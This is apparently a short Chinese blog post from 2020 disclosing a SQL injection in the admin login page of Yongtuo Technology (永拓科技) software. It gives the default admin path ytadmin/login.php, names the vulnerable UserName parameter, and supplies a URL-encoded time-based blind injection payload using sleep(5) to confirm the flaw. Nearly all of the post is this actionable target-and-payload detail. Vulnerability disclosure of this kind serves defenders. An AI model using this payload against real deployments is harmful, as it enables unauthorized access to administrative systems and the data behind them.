永拓科技后台登录界面SQL注入

永拓科技默认后台为ytadmin/login.php

 

 

UserName参数存在SQL注入

可使用%27%2b(select*from(select(sleep(5)))a)%2b%27进行判断

posted on 2020-12-25 18:25  icekind  阅读(138)  评论(0)    收藏  举报

导航